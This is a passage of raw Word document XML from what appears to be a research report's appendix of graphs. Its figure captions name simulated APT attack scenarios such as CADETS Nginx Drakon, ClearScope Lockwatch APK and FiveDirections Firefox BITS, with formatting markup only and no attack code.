      </w:r>
    </w:p>
    <w:p w14:paraId="42C2FF83" w14:textId="77777777" w:rsidR="009207BF" w:rsidRPr="000112FB" w:rsidRDefault="009207BF" w:rsidP="00821808">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:sectPr w:rsidR="009207BF" w:rsidRPr="000112FB" w:rsidSect="00B154B0">
          <w:headerReference w:type="default" r:id="rId31"/>
          <w:footerReference w:type="default" r:id="rId32"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05211C92" w14:textId="77C4B075" w:rsidR="00821808" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="287" w:name="_Toc12600168"/>
      <w:r>
        <w:t xml:space="preserve">Appendix A. </w:t>
      </w:r>
      <w:r w:rsidR="00365694">
        <w:t>Graphs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="287"/>
    </w:p>
    <w:bookmarkEnd w:id="274"/>
    <w:p w14:paraId="170C1059" w14:textId="4DD122ED" w:rsidR="00821808" w:rsidRDefault="00821808" w:rsidP="00821808"/>
    <w:p w14:paraId="446D2746" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="00821808" w:rsidRDefault="00821808" w:rsidP="00821808"/>
    <w:p w14:paraId="22B7736F" w14:textId="48EAA14A" w:rsidR="00A351B2" w:rsidRDefault="00821808">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32BEE92C" wp14:editId="53CA5623">
            <wp:extent cx="6692630" cy="2626468"/>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1 CADETS 1 Nginx Drakon APT.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6692630" cy="2626468"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5938769E" w14:textId="625367C0" w:rsidR="00821808" w:rsidRPr="009B5E2C" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B5E2C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="000755DE" w:rsidRPr="009B5E2C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000755DE" w:rsidRPr="009B5E2C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="000755DE" w:rsidRPr="009B5E2C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000112FB" w:rsidRPr="009B5E2C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="000755DE" w:rsidRPr="009B5E2C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009B5E2C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: CADETS1 Nginx Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B016A6" w14:textId="7561C8A0" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435A98A9" w14:textId="059F7306" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="510C68AC" w14:textId="641870DD" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18AEBB15" w14:textId="024BE495" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348CD456" w14:textId="19BAC788" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D85602F" w14:textId="70C7B241" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="380E56E2" w14:textId="77777777" w:rsidR="000112FB" w:rsidRPr="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD6F8CB" w14:textId="77777777" w:rsidR="00821808" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C78411E" w14:textId="77777777" w:rsidR="00821808" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45DDB230" wp14:editId="7DE64814">
            <wp:extent cx="8105568" cy="317121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1 CADETS 2 Nginx Drakon APT.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="8105568" cy="3171217"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CD4FD1" w14:textId="5AA549D7" w:rsidR="00821808" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="000755DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000755DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="000755DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000112FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="000755DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: CADETS2 Nginx Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4568BF06" w14:textId="77777777" w:rsidR="00821808" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13412FF3" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="00821808">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1857E973" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="574510F4" w14:textId="46D945CF" w:rsidR="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DA3BFA7" wp14:editId="460E98E1">
            <wp:extent cx="8613923" cy="3394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1 ClearScope 1 Lockwatch APK Java AP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614609" cy="3395224"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01274C8C" w14:textId="552D2608" w:rsidR="00821808" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="000755DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000755DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="000755DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000112FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="000755DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: ClearScope 1 Lockwatch APK Java APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B33053" w14:textId="77777777" w:rsidR="00821808" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40590059" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="00821808">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10AC2444" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="793FDC75" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="00821808">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0108EFE2" wp14:editId="79F02B42">
            <wp:extent cx="6731541" cy="534114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1 ClearScope 1 Tester Micro APT BinFmt-Elevate.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6732382" cy="5341814"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EACB83" w14:textId="3BA388BE" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: ClearScope 1 Tester Micro APT BinFmt-Elevate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57588921" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F22D308" w14:textId="3E61BE1F" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="383C0E4E" w14:textId="4CDC0DBC" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BB202F4" wp14:editId="6A6F59FC">
            <wp:extent cx="5571296" cy="4085617"/>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1 ClearScope 2 AppStarter APK Micro APT.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5571296" cy="4085617"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3107C26F" w14:textId="06A2663C" w:rsidR="000112FB" w:rsidRPr="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: ClearScope AppStarter APK Micro APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E31375" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ADACEC" w14:textId="779311D1" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7331CE65" wp14:editId="7728E982">
            <wp:extent cx="3647872" cy="36247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1 ClearScope 2 Barephone Micro APT.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3647872" cy="3624784"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="601F66DA" w14:textId="2FB990A3" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CEE9614" w14:textId="5237D211" w:rsidR="000112FB" w:rsidRPr="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: ClearScope 2 Barephone Micro APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ECAE4C" w14:textId="194B0CFD" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F3DF902" wp14:editId="21B6ADA2">
            <wp:extent cx="8714286" cy="295720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1 FiveDirections 1 Drakon APT Verifi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714286" cy="2957209"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E51F2C" w14:textId="1B018475" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: FiveDirections 1 Drakon APT Verifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127E6864" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="029A7039" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44531059" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="453B4265" wp14:editId="44F41AFD">
            <wp:extent cx="8842779" cy="316148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1 FiveDirections 2 Firefox BITS Micro APT.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
